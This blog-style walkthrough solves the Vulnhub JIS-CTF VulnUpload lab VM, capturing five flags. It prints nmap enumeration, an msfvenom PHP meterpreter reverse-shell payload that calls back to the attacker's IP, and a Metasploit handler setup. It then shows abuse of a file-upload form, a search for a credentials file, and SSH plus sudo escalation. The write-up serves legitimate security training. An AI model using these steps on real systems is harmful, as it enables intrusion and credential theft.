Vulnhub JIS-CTF: VulnUpload Writeup

This is a walkthrough of Vulnhub machine ‘JIS-CTF: VulnUpload’ released on Feb 8, 2018, by Mohammad Khreesha. I imported the virtual machine in Virtual Box in Bridged mode. The machine has five flags waiting to be captured en route to “r00t” access.

Attacker IP: 192.168.1.108
Server IP: 192.168.1.106

Using Nmap, enumerating for open ports and their respective services

root@kali:~# nmap -sC -sV 192.168.1.106
Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-12 00:26 IST
Nmap scan report for kioptrix3.com (192.168.1.106)
Host is up (0.00021s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 af:b9:68:38:77:7c:40:f6:bf:98:09:ff:d9:5f:73:ec (RSA)
|   256 b9:df:60:1e:6d:6f:d7:f6:24:fd:ae:f8:e3:cf:16:ac (ECDSA)
|_  256 78:5a:95:bb:d5:bf:ad:cf:b2:f5:0f:c0:0c:af:f7:76 (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 8 disallowed entries 
| / /backup /admin /admin_area /r00t /uploads 
|_/uploaded_files /flag
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Sign-Up/Login Form
|_Requested resource was login.php
MAC Address: 08:00:27:68:18:58 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.06 seconds

Browsing http://192.168.1.106 gives

Checking robots.txt file, browsing http://192.168.1.106/robots.txt

root@kali:~# curl http://192.168.1.106/robots.txt
User-agent: *
Disallow: /
Disallow: /backup
Disallow: /admin
Disallow: /admin_area
Disallow: /r00t
Disallow: /uploads
Disallow: /uploaded_files
Disallow: /flag

Browsing http://192.168.1.106/flag/ gives first flag.

Browsing http://192.168.1.106/admin_area gives second flag and login credentials

Logging in with the same credentials at http://192.168.1.106/ gives,

File upload functionality is exploited to get a reverse shell by uploading a meterpreter payload containig php file created using msfvenom.


root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=1337 -f raw > shelled.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1114 bytes

Also, setting up a reverse shell handler at port 1337


msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf exploit(multi/handler) > set LPORT 1337
LPORT => 1337
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.108:1337 

Uploading the created shelled.php and browsing http://192.168.1.106/uploaded_files/shelled.php gives a reverse meterpreter connection

Onto the third flag,


$ pwd    
/var/www/html/uploaded_files
$ cd ..
$ ls      
admin_area
assets
check_login.php
css
flag
flag.txt
hint.txt
index.php
js
login.php
logout.php
robots.txt
uploaded_files
$ cat hint.txt
try to find user technawi password to read the flag.txt file, you can find it in a hidden file ;)

The 3rd flag is : {7645110034526579012345670}

As suggested in hint to find the user technawi credentials, I enumerated the files owned by user technawi (to be noted, I ignored all warnings)

$ find / -user technawi -type f 2>&1 | grep -v "Permission" | grep -v "No such"
/etc/mysql/conf.d/credentials.txt
/var/www/html/flag.txt
/home/technawi/.bash_history
/home/technawi/.sudo_as_admin_successful
/home/technawi/.profile
/home/technawi/.bashrc
/home/technawi/.bash_logout
$ cat /etc/mysql/conf.d/credentials.txt
The 4th flag is : {7845658974123568974185412}

username : technawi
password : 3vilH@ksor

Using the obtained credentials, login using SSH to get access with user technawi privileges. Further elevating to root privileges using sudo access.
The fifth flag is obtained in folder /var/www/html.

Leave a Reply

Your email address will not be published. Required fields are marked *